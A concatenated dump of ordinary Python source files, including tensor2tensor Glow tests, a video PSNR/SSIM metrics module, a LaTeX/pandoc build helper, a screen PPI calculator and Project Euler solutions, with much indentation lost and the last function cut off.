self.assertEqual(z_inv_levels_np[0].shape, (16, 32, 32, 8))
self.assertEqual(z_inv_levels_np[1].shape, (16, 16, 16, 16))
        self.assertEqual(x_inv_np.shape, (16, 8, 8, 64))
self.assertTrue(np.allclose(diff, 0.0, atol=1e-2))
def test_encoder_decoder_practical_usage(self):
"""Tests the following sequence of operations.
1. Define forward network with arg_scope(init=True).
2. Run one-forward pass to do data-dependent initialization and save.
3. Define forward and reverse network with arg_scope(init=False)
4. Check that reverse(forward(x)) == x
"""
hparams = glow.glow_hparams()
hparams.n_levels = 2
hparams.depth = 12
with tf.Graph().as_default():
rng = np.random.RandomState(0)
x_rand = np.asarray(rng.rand(1, 4, 4, 4), dtype=np.float32)
x_t = tf.convert_to_tensor(x_rand)
ops = [glow_ops.get_variable_ddi, glow_ops.actnorm]
with arg_scope(ops, init=True):
x_inv, _, _, _, _ = glow_ops.encoder_decoder(
"revnet", x_t, hparams, reverse=False)
curr_dir = tempfile.mkdtemp()
model_path = os.path.join(curr_dir, "model")
with tf.Session() as session:
saver = tf.train.Saver()
session.run(tf.global_variables_initializer())
session.run(x_inv)
saver.save(session, model_path)
with tf.Graph().as_default():
rng = np.random.RandomState(0)
x_rand = np.asarray(rng.rand(1, 4, 4, 4), dtype=np.float32)
x_t = tf.convert_to_tensor(x_rand)
ops = [glow_ops.get_variable_ddi, glow_ops.actnorm]
with arg_scope(ops, init=False):
x_inv2, _, all_eps, _, _ = glow_ops.encoder_decoder(
"revnet", x_t, hparams, reverse=False)
x_inv_inv_, _, _, _ = glow_ops.encoder_decoder(
"revnet", x_inv2, hparams, eps=all_eps, reverse=True)
with tf.Session() as session:
saver = tf.train.Saver()
saver.restore(session, model_path)
x_inv_inv_np = session.run(x_inv_inv_)
diff = np.abs(x_inv_inv_np - x_rand)
self.assertTrue(np.allclose(diff, 0.0, atol=1e-3))
def test_scale_gaussian_prior(self):
with tf.Graph().as_default():
rng = np.random.RandomState(0)
img_shape = (16, 2, 2, 2)
x_rand = np.asarray(rng.randint(0, 10, img_shape), dtype=np.float32)
z_rand = np.asarray(rng.randint(0, 10, img_shape), dtype=np.float32)
x_t = tf.convert_to_tensor(x_rand)
z_t = tf.convert_to_tensor(z_rand)
dist = glow_ops.scale_gaussian_prior(
"scale_gaussian_prior", z_t, x_t, trainable=True)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
mean, scale = sess.run([dist.loc, dist.scale])
self.assertTrue(np.allclose(mean, z_rand))
self.assertTrue(np.allclose(scale, 1.0))
def check_split_latent_conditioning(self, merge_std):
with tf.Graph().as_default():
rng = np.random.RandomState(0)
x_rand = rng.randn(12, 32, 32, 32).astype(np.float32)
latent_rand = rng.randn(12, 32, 32, 16).astype(np.float32)
x_t = tf.convert_to_tensor(x_rand)
latent_t = tf.convert_to_tensor(latent_rand)
hparams = glow.glow_hparams()
hparams.level_scale = merge_std
hparams.add_hparam("latent_dist_encoder", "pointwise")
      # Test initialization.
# x2 ~ N(scale * latent, 1.0) where initial scale is 1.0
exp_x2 = x_rand[:, :, :, 16:]
exp_eps = x_rand[:, :, :, 16:] - latent_rand
x_inv, _, eps, x2_t, _ = glow_ops.split(
merge_std, x_t, cond_latents=latent_t, hparams=hparams)
# Test reversibility.
x_inv_inv, _, _ = glow_ops.split(
merge_std, x_inv, cond_latents=latent_t, eps=eps, reverse=True,
hparams=hparams)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
actual_eps, actual_x2, diff_np = sess.run([eps, x2_t, x_inv_inv - x_t])
self.assertTrue(np.allclose(diff_np, 0.0, atol=1e-5))
self.assertTrue(np.allclose(actual_eps, exp_eps))
self.assertTrue(np.allclose(exp_x2, actual_x2))
def test_split_latent_conditioning(self):
for merge_std in ["normal", "prev_level", "prev_step"]:
self.check_split_latent_conditioning(merge_std)
def test_latent_dist_encoder_lstm(self):
with tf.Graph().as_default():
rng = np.random.RandomState(0)
# Initialize x, latent, state.
x_rand = rng.randn(12, 32, 32, 16).astype(np.float32)
latent_rand = rng.randn(12, 32, 32, 16).astype(np.float32)
state_rand = rng.randn(12, 32, 32, 16).astype(np.float32)
x_t = tf.convert_to_tensor(x_rand)
latent_t = tf.convert_to_tensor(latent_rand)
state_t = tf.convert_to_tensor(state_rand)
init_state = tf.contrib.rnn.LSTMStateTuple(state_t, state_t)
hparams = glow.glow_hparams()
hparams.add_hparam("latent_dist_encoder", "conv_lstm")
hparams.add_hparam("latent_skip", True)
prior_dist, new_state = glow_ops.compute_prior(
"lstm_prior", x_t, latent=latent_t, hparams=hparams, state=init_state)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
# Test initialization (mu, sigma) = (z, 1.0)
ops = [prior_dist.loc, prior_dist.scale, new_state.h - init_state.h]
mean, scale, diff_np = sess.run(ops)
self.assertTrue(np.allclose(latent_rand - mean, 0.0))
self.assertTrue(np.allclose(scale, 1.0))
# State update.
self.assertFalse(np.allclose(diff_np, 0.0))
if __name__ == "__main__":
tf.test.main()
```
#### File: tensor2tensor/utils/video_metrics.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import numpy as np
import six
import tensorflow as tf
def load_image_map_function(filename, frame_shape):
image = tf.read_file(filename)
image = tf.image.decode_png(image)
image = tf.image.resize_images(image, frame_shape[0:2])
image.set_shape(frame_shape)
return image
def load_videos(template, video_length, frame_shape):
"""Loads videos from files.
Args:
template: template string for listing the image files.
video_length: length of the video.
frame_shape: shape of each frame.
Returns:
dataset: the tf dataset frame by frame.
dataset_len: number of the items which is the number of image files.
Raises:
ValueError: if no files found.
"""
filenames = tf.gfile.Glob(template)
if not filenames:
raise ValueError("no files found.")
filenames = sorted(filenames)
dataset_len = len(filenames)
filenames = tf.constant(filenames)
dataset = tf.data.Dataset.from_tensor_slices(filenames)
dataset = dataset.apply(tf.contrib.data.map_and_batch(
lambda filename: load_image_map_function(filename, frame_shape),
video_length, drop_remainder=True))
return dataset, dataset_len
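def _example_load_videos():
  """Usage sketch (added for illustration; the path, video length and frame
  shape below are hypothetical, not part of the original module)."""
  dataset, num_frames = load_videos(
      "/tmp/decodes/my_problem_targets*.png", video_length=10,
      frame_shape=(64, 64, 3))
  num_videos = num_frames // 10
  return dataset, num_videos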
def file_pattern(output_dir, problem_name, prefix):
return os.path.join(output_dir, "{}_{}*.png".format(problem_name, prefix))
def get_target_and_output_filepatterns(output_dir, problem_name):
return (file_pattern(output_dir, problem_name, "outputs"),
file_pattern(output_dir, problem_name, "targets"))
def get_zipped_dataset_from_png_files(
output_files, target_files, video_length, frame_shape):
outputs, len_ = load_videos(output_files, video_length, frame_shape)
targets, len_ = load_videos(target_files, video_length, frame_shape)
zipped_dataset = tf.data.Dataset.zip((outputs, targets))
num_videos = len_ // video_length
iterator = zipped_dataset.make_one_shot_iterator()
return iterator, None, num_videos
def save_results(results, output_dir, problem_name):
for name, array in six.iteritems(results):
output_filename = "{}_{}.npy".format(problem_name, name)
output_filename = os.path.join(output_dir, output_filename)
with tf.gfile.Open(output_filename, "wb") as fname:
np.save(fname, array)
def psnr_and_ssim(output, target):
"""Compute the PSNR and SSIM.
Args:
output: 4-D Tensor, shape=(num_frames, height, width, num_channels)
target: 4-D Tensor, shape=(num_frames, height, width, num_channels)
Returns:
psnr: 1-D Tensor, shape=(num_frames,)
ssim: 1-D Tensor, shape=(num_frames,)
"""
output = tf.cast(output, dtype=tf.int32)
target = tf.cast(target, dtype=tf.int32)
psnr = tf.image.psnr(output, target, max_val=255)
ssim = tf.image.ssim(output, target, max_val=255)
return psnr, ssim
def stack_data_given_key(predictions, key):
x = [p[key] for p in predictions]
x = np.stack(x, axis=0)
return x
def get_zipped_dataset_from_predictions(predictions):
"""Creates dataset from in-memory predictions."""
targets = stack_data_given_key(predictions, "targets")
outputs = stack_data_given_key(predictions, "outputs")
num_videos = len(targets)
targets_placeholder = tf.placeholder(targets.dtype, targets.shape)
outputs_placeholder = tf.placeholder(outputs.dtype, outputs.shape)
dataset = tf.data.Dataset.from_tensor_slices(
(targets_placeholder, outputs_placeholder))
iterator = dataset.make_initializable_iterator()
feed_dict = {targets_placeholder: targets,
outputs_placeholder: outputs}
return iterator, feed_dict, num_videos
def compute_one_decoding_video_metrics(iterator, feed_dict, num_videos):
"""Computes the average of all the metric for one decoding.
Args:
iterator: dataset iterator.
feed_dict: feed dict to initialize iterator.
num_videos: number of videos.
Returns:
all_psnr: 2-D Numpy array, shape=(num_samples, num_frames)
all_ssim: 2-D Numpy array, shape=(num_samples, num_frames)
"""
output, target = iterator.get_next()
metrics = psnr_and_ssim(output, target)
with tf.Session() as sess:
sess.run(tf.local_variables_initializer())
    initializer = iterator._initializer  # pylint: disable=protected-access
    if initializer is not None:
      sess.run(initializer, feed_dict=feed_dict)
all_psnr, all_ssim = [], []
for i in range(num_videos):
print("Computing video: %d" % i)
psnr_np, ssim_np = sess.run(metrics)
all_psnr.append(psnr_np)
all_ssim.append(ssim_np)
all_psnr = np.array(all_psnr)
all_ssim = np.array(all_ssim)
return all_psnr, all_ssim
def reduce_to_best_decode(metrics, reduce_func):
"""Extracts the best-decode from the metrics according to reduce_func.
Args:
metrics: 3-D numpy array, shape=(num_decodes, num_samples, num_frames)
reduce_func: callable, np.argmax or np.argmin.
Returns:
best_metrics: 2-D numpy array, shape=(num_samples, num_frames).
"""
num_videos = metrics.shape[1]
# Take mean of the metric across the frames to approximate the video
# closest to the ground truth.
mean_across_frames = np.mean(metrics, axis=-1)
# For every sample, use the decode that has a maximum mean-metric.
best_decode_ind = reduce_func(mean_across_frames, axis=0)
return metrics[best_decode_ind, np.arange(num_videos), :]
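def _example_reduce_to_best_decode():
  """Minimal numpy sketch (added for illustration, not in the original module).

  Two decodes of two videos, three frames each. With np.argmax we keep, for
  every video, the decode with the highest per-video mean, so the result mixes
  decode 1 for video 0 and decode 0 for video 1.
  """
  metrics = np.array([[[10., 10., 10.], [30., 30., 30.]],
                      [[20., 20., 20.], [5., 5., 5.]]])
  best = reduce_to_best_decode(metrics, np.argmax)
  # best == [[20., 20., 20.], [30., 30., 30.]]
  return best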
def compute_all_metrics_statistics(all_results):
"""Computes statistics of metrics across multiple decodings.
Args:
    all_results: dict of 3-D numpy arrays.
Each array has shape=(num_decodes, num_samples, num_frames).
Returns:
statistics: dict of 1-D numpy arrays shape=(num_frames).
First the statistic (max/mean/std) is computed across the
decodes, then the mean is taken across num_samples.
"""
statistics = {}
all_metrics = all_results.keys()
for key in all_metrics:
values = all_results[key]
statistics[key + "_MEAN"] = np.mean(values, axis=0)
statistics[key + "_STD"] = np.std(values, axis=0)
statistics[key + "_MIN"] = reduce_to_best_decode(values, np.argmin)
statistics[key + "_MAX"] = reduce_to_best_decode(values, np.argmax)
# Computes mean of each statistic across the dataset.
for key in statistics:
statistics[key] = np.mean(statistics[key], axis=0)
return statistics
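def _example_metrics_statistics():
  """Shape sketch (added for illustration, not in the original module)."""
  # Two decodes, three videos, two frames of a single (dummy) metric.
  psnr = np.arange(12, dtype=np.float32).reshape(2, 3, 2)
  stats = compute_all_metrics_statistics({"PSNR": psnr})
  # stats has keys PSNR_MEAN, PSNR_STD, PSNR_MIN, PSNR_MAX, each a 1-D array
  # with one value per frame, i.e. shape (2,).
  return stats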
def compute_video_metrics_from_predictions(predictions):
"""Computes metrics from predictions.
Args:
predictions: list of list of dicts.
outer length: num_decodes, inner_length: num_samples
Returns:
statistics: dict of Tensors, key being the metric with each Tensor
having the shape (num_samples, num_frames).
"""
ssim_all_decodes, psnr_all_decodes = [], []
for single_decode in predictions:
args = get_zipped_dataset_from_predictions(single_decode)
psnr_single, ssim_single = compute_one_decoding_video_metrics(*args)
psnr_all_decodes.append(psnr_single)
ssim_all_decodes.append(ssim_single)
psnr_all_decodes = np.array(psnr_all_decodes)
ssim_all_decodes = np.array(ssim_all_decodes)
all_results = {"PSNR": psnr_all_decodes, "SSIM": ssim_all_decodes}
statistics = compute_all_metrics_statistics(all_results)
return statistics
def compute_video_metrics_from_png_files(
output_dirs, problem_name, video_length, frame_shape):
"""Computes the average of all the metric for one decoding.
This function assumes that all the predicted and target frames
have been saved on the disk and sorting them by name will result
to consecutive frames saved in order.
Args:
output_dirs: directory with all the saved frames.
problem_name: prefix of the saved frames usually name of the problem.
video_length: length of the videos.
frame_shape: shape of each frame in HxWxC format.
Returns:
Dictionary which contains the average of each metric per frame.
"""
ssim_all_decodes, psnr_all_decodes = [], []
for output_dir in output_dirs:
output_files, target_files = get_target_and_output_filepatterns(
output_dir, problem_name)
args = get_zipped_dataset_from_png_files(
output_files, target_files, video_length, frame_shape)
psnr_single, ssim_single = compute_one_decoding_video_metrics(*args)
psnr_all_decodes.append(psnr_single)
ssim_all_decodes.append(ssim_single)
psnr_all_decodes = np.array(psnr_all_decodes)
ssim_all_decodes = np.array(ssim_all_decodes)
all_results = {"PSNR": psnr_all_decodes, "SSIM": ssim_all_decodes}
statistics = compute_all_metrics_statistics(all_results)
return statistics, all_results
def compute_and_save_video_metrics(
output_dirs, problem_name, video_length, frame_shape):
"""Compute and saves the video metrics."""
statistics, all_results = compute_video_metrics_from_png_files(
output_dirs, problem_name, video_length, frame_shape)
  # Save the per-decode metrics next to the frames of each decode.
  for decode_ind, output_dir in enumerate(output_dirs):
    decode_results = {name: array[decode_ind]
                      for name, array in six.iteritems(all_results)}
    save_results(decode_results, output_dir, problem_name)
  parent_dir = os.path.join(output_dirs[0], os.pardir)
  final_dir = os.path.join(parent_dir, "decode")
  tf.gfile.MakeDirs(final_dir)
  save_results(statistics, final_dir, problem_name)
``` |
{
"source": "jinlibao/MATLAB-files",
"score": 4
} |
#### File: Project.Euler/Answers.Python/4.py
```python
import math
def isPalindromic(number):
    numberLength = len(str(number))
digits = []
while number > 0:
digits.append(number % 10)
        number //= 10
i = 0
while i <= numberLength / 2:
if digits[i] != digits[numberLength-i-1]:
break
else:
i += 1
if i > numberLength / 2:
return True
else:
return False
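# Equivalent string-based check, added as a sketch for comparison only:
def isPalindromicStr(number):
    s = str(number)
    return s == s[::-1]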
def Palindromic(n):
f = [10 ** (n)-1, 10 ** (n)-1]
p = []
while f[0] >= 10 ** (n-1):
while f[1] >= 10 ** (n-1):
d = f[0] * f[1]
type = isPalindromic(d)
if type == True:
p.append(d)
# print f[0], f[1]
f[1] -= 1
else:
f[1] -= 1
f[0] -= 1
f[1] = f[0]
# print p
return max(p)
t = Palindromic(3)
print(t)
``` |
{
"source": "jinlibao/Pandoc-LaTeX-Templates",
"score": 3
} |
#### File: Notes/LaTeX/compile.py
```python
import os
import sys
import re
import time
import platform
__author__ = '<NAME>'
__create_date__ = '01/13/2017'
__last_update_date__ = '02/07/2018'
__copyright__ = "Copyright (c) 2018 Libao Jin"
__license__ = "MIT"
__version__ = "1.5.1"
__maintainer__ = "<NAME>"
__email__ = "<EMAIL>"
__status__ = "Complete"
class Compiler():
'''Compile pandoc file to PDF, M$ Word documents etc.'''
folder = '.'
metadata = ''
filename = ''
source_file_body = 'body.tex'
source_file_main = 'main.tex'
output_file_main = 'main.pdf'
title = ''
last_name = 'Libao'
first_name = 'Jin'
email = '<EMAIL>'
author = r'{0} {1} (\\url{{{2}}})'.format(last_name, first_name, email)
date = '01/01/2017'
platform = ''
def __init__(self):
'''Initialization of class compile'''
self.folder = '.'
self.metadata = [('', '', '', '')]
self.platform = platform.system()
def get_metadata(self):
        '''Extract metadata (e.g. book name and document type) from the folder structure.'''
folder = self.folder
pathname = os.path.realpath(folder)
print(pathname)
print()
if self.platform == 'Windows':
string = r'([\w.-]+)\\([\w\d\s.-]+)\\LaTeX'
else:
            string = r'([\w.-]+)/([\w\d\s.-]+)/LaTeX'
pattern = re.compile(string)
self.metadata = re.findall(pattern, pathname)
print(self.metadata)
def generate_filename(self):
'''Generate filename for output file.'''
metadata = self.metadata[0]
print(metadata)
book = metadata[0]
doc_type = metadata[1].replace(' ', '.')
self.filename = '{0}.{1}_{2}.{3}.pdf'.format(book, doc_type, self.last_name, self.first_name)
def generate_title(self):
'''Generate title for the article/document.'''
metadata = self.metadata[0]
book = metadata[0].replace('.', ' ')
doc_type = metadata[1].replace('.', ' ')
self.title = '{0} {1}'.format(book, doc_type)
print(self.title)
def update_date(self):
t = time.localtime()
day = str(t.tm_mday).zfill(2)
month = str(t.tm_mon).zfill(2)
year = str(t.tm_year).zfill(4)
self.date = '{0}/{1}/{2}'.format(month, day, year)
def update_author_1(self):
'''Update author information in the source file to be compiled.'''
source_file = self.source_file_main
author = self.author
f = open(source_file, 'r')
content = f.read()
string = r'\\author{[\w\d\s]*}'
p = re.compile(string)
content = p.sub(r'\\author{{{0}}}'.format(author), content)
f.close()
f = open(source_file, 'w')
f.write(content)
f.close()
def update_title(self):
'''Update title in the source file to be compiled.'''
source_file = self.source_file_main
title = self.title
f = open(source_file, 'r')
content = f.read()
string = r'\\title{[\w\d\s.-]*}'
p = re.compile(string)
content = p.sub(r'\\title{{{0}}}'.format(title), content)
f.close()
f = open(source_file, 'w')
f.write(content)
f.close()
def heading_style_0(self):
        '''Change section headings to unnumbered boldface headings.'''
source_file = self.source_file_body
f = open(source_file, 'r')
content = f.read()
string = r'\\section'
p = re.compile(string)
content = p.sub(r'\\textbf', content, count=1)
content = p.sub(r'\n\\textbf', content)
string = r'}\\label{[\w\d-]+}\n'
p = re.compile(string)
content = p.sub('.}', content)
f.close()
f = open(source_file, 'w')
f.write(content)
f.close()
def heading_style_1(self):
        '''Change section headings to unnumbered boldface headings, each starting on a new page.'''
source_file = self.source_file_body
f = open(source_file, 'r')
content = f.read()
string = r'\\section'
p = re.compile(string)
content = p.sub(r'\\textbf', content, count=1)
content = p.sub(r'\\newpage\n\\textbf', content)
string = r'}\\label{[\w\d-]+}\n'
p = re.compile(string)
content = p.sub('.}', content)
f.close()
f = open(source_file, 'w')
f.write(content)
f.close()
def update_package(self, option):
'''Update title in the source file to be compiled.'''
source_file = self.source_file_main
f = open(source_file, 'r')
content = f.read()
if option == 'p':
string = r'^\\usepackage{fontspec}'
p = re.compile(string, re.MULTILINE)
content = p.sub(r'% \\usepackage{fontspec}', content)
string = r'^\\setmonofont\[Scale=0.8\]{Monaco}'
p = re.compile(string, re.MULTILINE)
content = p.sub(r'% \\setmonofont[Scale=0.8]{Monaco}', content)
elif option == 'x':
string = r'[% ]*\\usepackage{fontspec}'
p = re.compile(string)
content = p.sub(r'\\usepackage{fontspec}', content)
string = r'[% ]*\\setmonofont\[Scale=0.8\]{Monaco}'
p = re.compile(string)
content = p.sub(r'\\setmonofont[Scale=0.8]{Monaco}', content)
f.close()
f = open(source_file, 'w')
f.write(content)
f.close()
def compile_pdflatex(self):
'''Compile files by calling pandoc, pdflatex and rm commands to keep the file structure organized.'''
if self.platform == 'Windows':
path = '..\\' + self.filename
else:
path = '../' + self.filename
if os.path.exists(path):
os.remove(path)
if self.platform == 'Windows':
os.system('pdflatex -quiet {0}'.format(self.source_file_main))
os.system('pdflatex -quiet {0}'.format(self.source_file_main))
os.system('del *.log *.aux *.idx *.out *.toc *~')
os.rename('{0}'.format(self.output_file_main), path)
else:
os.system('pdflatex -interaction=batchmode {0}'.format(self.source_file_main))
os.system('pdflatex -interaction=batchmode {0}'.format(self.source_file_main))
os.system('rm *.log *.aux *.idx *.out *.toc *~')
os.rename('{0}'.format(self.output_file_main), path)
def compile_xelatex(self):
'''Compile files by calling pandoc, pdflatex and rm commands to keep the file structure organized.'''
if self.platform == 'Windows':
path = '..\\' + self.filename
else:
path = '../' + self.filename
if os.path.exists(path):
os.remove(path)
if self.platform == 'Windows':
os.system('xelatex -quiet {0}'.format(self.source_file_main))
os.system('xelatex -quiet {0}'.format(self.source_file_main))
os.system('del *.log *.aux *.idx *.out *.toc *~')
os.rename('{0}'.format(self.output_file_main), path)
else:
os.system('xelatex -interaction=batchmode {0}'.format(self.source_file_main))
os.system('xelatex -interaction=batchmode {0}'.format(self.source_file_main))
os.system('rm *.log *.aux *.idx *.out *.toc *~')
os.rename('{0}'.format(self.output_file_main), path)
def generate_source_file_body(self):
'''Generate source file body.tex from body.pdc by using pandoc'''
os.system('pandoc -f markdown -o body.tex body.pdc')
def run(self):
        '''Run a series of commands to compile the TeX file and clean up unnecessary files.'''
self.get_metadata()
self.generate_filename()
self.generate_title()
self.generate_source_file_body()
if len(sys.argv) == 1:
print('Heading Style: Normal.')
self.update_author_1()
elif sys.argv[1] == '0':
print('Heading Style: Boldface.')
self.heading_style_0()
self.update_author_1()
elif sys.argv[1] == '1':
            print('Heading Style: Boldface with page breaks.')
self.heading_style_1()
self.update_author_1()
else:
print('Error.')
self.update_title()
if len(sys.argv) <= 2:
self.update_package('x')
self.compile_xelatex()
self.update_package('p')
elif sys.argv[2] == 'p':
self.compile_pdflatex()
self.update_package('p')
elif sys.argv[2] == 'x':
self.update_package('x')
self.compile_xelatex()
self.update_package('p')
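# Usage sketch (derived from run() above):
#   python compile.py          # normal headings, compile with xelatex
#   python compile.py 0        # boldface headings, xelatex
#   python compile.py 1        # boldface headings with page breaks, xelatex
#   python compile.py 0 p      # boldface headings, compile with pdflatex
#   python compile.py 0 x      # boldface headings, compile with xelatex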
if __name__ == '__main__':
compiler = Compiler()
compiler.run()
``` |
{
"source": "jinlibao/toolkits",
"score": 4
} |
#### File: Python/Computer.Performance/ppi.py
```python
import math
__author__ = '<NAME>'
__date__ = 'July 21, 2015'
class Screen():
'''
Class: A Digital Screen
'''
    def __init__(self, **screen_info):
        'Constructor (merged; Python does not support overloaded __init__).'
        self.ppi = None
        self.width = screen_info.get('width')
        self.height = screen_info.get('height')
        self.size = screen_info.get('size')
def compute_ppi(self, width, height, size):
ppi = math.sqrt(width ** 2 + height ** 2) / size
print('-' * 40)
print('Screen size: {0:.1f} inches'.format(size))
print('Resolution')
print('width: {0:d}'.format(width))
print('height: {0:d}'.format(height))
print('ppi: {0:.1f}'.format(ppi))
def set_ppi(self):
self.ppi = math.sqrt(self.width ** 2 + self.height ** 2) / self.size
def get_width(self):
'Get width.'
return self.width
def get_height(self):
'Get height.'
return self.height
def get_size(self):
'Get size.'
return self.size
def get_ppi(self):
'Get ppi.'
return self.ppi
def get_screen_info(self):
'Get screen detailed info.'
print('-' * 40)
print('Screen size: {0:.1f} inches'.format(self.size))
print('Resolution')
print('width: {0:d}'.format(self.width))
print('height: {0:d}'.format(self.height))
print('ppi: {0:.1f}'.format(self.ppi))
if __name__ == '__main__':
width = 1280
height = 720
size = 5.5
screen_info = {'width': width, 'height': height, 'size': size}
s = Screen(**screen_info)
s.set_ppi()
s.get_screen_info()
s.compute_ppi(1920, 1080, 5.7)
s.compute_ppi(2560, 1440, 5.7)
s.compute_ppi(1366, 768, 13.6)
s.compute_ppi(1920, 1080, 5.5)
s.compute_ppi(1280, 768, 5)
s.compute_ppi(1920, 1080, 4.95)
s.compute_ppi(1136, 640, 4)
s.compute_ppi(2560, 1600, 13.3)
s.compute_ppi(2880, 1800, 15.4)
```
#### File: Project.Euler/Answers.Python/12_old.py
```python
import math
__author__ = '<NAME>'
__date__ = 'July 13, 2015'
def AccumulateSumSequence(n):
seq = []
i = 1
currentValue = 0
while i <= n:
currentValue += i
seq.append(currentValue)
i += 1
return seq
def AccumulateSumGenerator(n):
number = 0
i = 1
while i <= n:
number += i
i += 1
return number
def Factorization(n):
currentFactor = 1
factors = []
while currentFactor <= n // 2:
if n % currentFactor == 0:
factors.append(currentFactor)
currentFactor += 1
factors.append(n)
return factors
def SeqFactors(n):
seq = AccumulateSumSequence(n)
numfactors = []
for i in seq:
factors = Factorization(i)
numfactors.append([i,len(factors),factors])
return numfactors
def NumberFactors(LengthBound):
length = 0
n = 1
while length <= LengthBound:
number = AccumulateSumGenerator(n)
factors = Factorization(number)
length = len(factors)
n += 1
numberInfo = [number, len(factors), factors]
return numberInfo
def test1():
s = SeqFactors(10)
for i in s:
print(i)
def solution():
result = NumberFactors(500)
print(result)
#test1()
solution()
```
#### File: Project.Euler/Answers.Python/14.py
```python
__author__ = '<NAME>'
__date__ = 'July 13, 2015'
def isEven(n):
if n % 2 == 0:
return True
else:
return False
def collatzTransform(n):
if isEven(n):
n = n // 2
else:
n = 3 * n + 1
return n
def CollatzSequence(startNumber):
collatzSeq = [startNumber]
transformedNumber = collatzTransform(startNumber)
collatzSeq.append(transformedNumber)
while transformedNumber != 1:
transformedNumber = collatzTransform(transformedNumber)
collatzSeq.append(transformedNumber)
return [startNumber, len(collatzSeq), collatzSeq]
def longestCollatzStartNumber(UpperBound):
currentStartNumber = 3
currentMaxStartNumber = currentStartNumber
currentMaxLength = 0
longestCollatzSeq = 0
while currentStartNumber < UpperBound:
ccs = CollatzSequence(currentStartNumber)
if currentMaxLength < ccs[1]:
currentMaxLength = ccs[1]
currentMaxStartNumber = ccs[0]
currentStartNumber += 1
lcs = CollatzSequence(currentMaxStartNumber)
return lcs
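# Faster variant (sketch, added for comparison): cache sequence lengths per
# starting number instead of storing whole sequences; for this problem it
# should report the same (start number, length) pair as longestCollatzStartNumber.
def longestCollatzCached(UpperBound):
    lengths = {1: 1}
    best = (1, 1)
    for start in range(2, UpperBound):
        n, steps = start, 0
        while n not in lengths:
            n = collatzTransform(n)
            steps += 1
        lengths[start] = steps + lengths[n]
        if lengths[start] > best[1]:
            best = (start, lengths[start])
    return best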
def test1():
cs = CollatzSequence(13)
print(cs)
def test2():
lcs = longestCollatzStartNumber(1000000)
print(lcs)
test2()
```
#### File: Project.Euler/Answers.Python/19.py
```python
__author__ = '<NAME>'
__date__ = 'July 17, 2015'
def isLeapYear(year):
if year % 400 == 0:
return True
elif year % 100 != 0 and year % 4 == 0:
return True
else:
return False
def daysInYear(date):
year, month, day = date
months = range(1, month)
days = 0
for m in months:
days += daysOfMonth(year, m)
days += day
return days
def daysInYearReversed(date):
days = daysOfYear(date[0]) - daysInYear(date)
return days
def daysOfYear(year):
if isLeapYear(year):
days = 366
else:
days = 365
return days
def daysOfMonth(year, month):
if month == 1\
or month == 3\
or month == 5\
or month == 7\
or month == 8\
or month == 10\
or month == 12:
days = 31
elif month == 2:
if isLeapYear(year):
days = 29
else:
days = 28
else:
days = 30
return days
def countDays(dateStart, dateEnd):
yearStart, monthStart, dayStart = dateStart
yearEnd, monthEnd, dayEnd = dateEnd
years = range(yearStart+1, yearEnd)
days = daysInYearReversed(dateStart)
days += daysInYear(dateEnd)
for y in years:
days += daysOfYear(y)
return days
def whichDay(date):
dateFrom = (1900, 1, 1)
days = countDays(dateFrom, date)
remainder = days % 7
if remainder == 0:
day = 'Monday'
elif remainder == 1:
day = 'Tuesday'
elif remainder == 2:
day = 'Wednesday'
elif remainder == 3:
day = 'Thursday'
elif remainder == 4:
day = 'Friday'
elif remainder == 5:
day = 'Saturday'
elif remainder == 6:
day = 'Sunday'
return day
def directMethod():
dateStart = (1901, 1, 1)
dateEnd = (2000, 12, 31)
years = range(dateStart[0], dateEnd[0]+1)
months = range(1, 13)
Sundays = []
for y in years:
for m in months:
firstOfMonth = (y, m, 1)
if whichDay(firstOfMonth) == 'Sunday':
Sundays.append(firstOfMonth)
return (len(Sundays), Sundays)
def test():
#dateStart = (1993, 7, 17)
#dateEnd = (2015, 7, 17)
#days = countDays(dateStart, dateEnd)
#print(days)
#day = whichDay(dateEnd)
#print(day)
result = directMethod()
print(result)
test()
```
#### File: Project.Euler/Answers.Python/28.py
```python
__author__ = '<NAME>'
__date__ = 'July 18, 2015'
def list2stringList(list):
stringList = []
for l in list:
for s in l:
stringList.append(s)
return stringList
def direction(UPPER_BOUND):
orientation = ['R', 'D', 'L', 'U']
rSeq = list(range(1, UPPER_BOUND+2, 2))
dSeq = list(range(1, UPPER_BOUND+2, 2))
lSeq = list(range(2, UPPER_BOUND+2, 2))
uSeq = list(range(2, UPPER_BOUND+2, 2))
#print(rSeq, dSeq, lSeq, uSeq)
i = 0
directions = [rSeq[i]*orientation[0]]
index = rSeq[i]
while index < UPPER_BOUND ** 2:
directions.append(dSeq[i] * orientation[1])
directions.append(lSeq[i] * orientation[2])
directions.append(uSeq[i] * orientation[3])
directions.append(rSeq[i+1] * orientation[0])
index += dSeq[i] + lSeq[i] + uSeq[i] + rSeq[i+1]
i += 1
directions = list2stringList(directions)
#print(directions)
return directions
def route(UPPER_BOUND):
directions = direction(UPPER_BOUND)
point = (UPPER_BOUND+1) // 2
currentPoint = (point-1, point-1)
pointInfo = []
pointInfo.append((1, currentPoint))
for i,e in enumerate(directions[0:-1]):
if e == 'R':
currentPoint = (currentPoint[0], currentPoint[1] + 1)
pointInfo.append((i+2, currentPoint))
elif e == 'D':
currentPoint = (currentPoint[0] + 1, currentPoint[1])
pointInfo.append((i+2, currentPoint))
elif e == 'L':
currentPoint = (currentPoint[0], currentPoint[1] - 1)
pointInfo.append((i+2, currentPoint))
elif e == 'U':
currentPoint = (currentPoint[0] - 1, currentPoint[1])
pointInfo.append((i+2, currentPoint))
return pointInfo
def matrix(UPPER_BOUND):
matrix = [[None for i in range(UPPER_BOUND)] for i in range(UPPER_BOUND)]
pointInfo = route(UPPER_BOUND)
for p in pointInfo:
matrix[p[1][0]][p[1][1]] = p[0]
for i in matrix:
print(i)
return matrix
def size(matrix):
rowLength = len(matrix)
colLength = len(matrix[0])
sizeOfMatrix = (rowLength, colLength)
return sizeOfMatrix
def diagonalSum(matrix):
sizeOfMatrix = size(matrix)
index = range(sizeOfMatrix[0])
dSum = 0
for i in index:
dSum += matrix[i][i]
for i in index:
dSum += matrix[i][-(i+1)]
dSum -= 1
return dSum
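# Closed-form alternative (sketch, added for comparison): on a spiral of odd
# side length s >= 3, the four corners of that ring sum to 4*s*s - 6*(s - 1),
# so adding the centre 1 gives the diagonal sum without building the matrix.
def diagonalSumClosedForm(n):
    total = 1
    for s in range(3, n + 1, 2):
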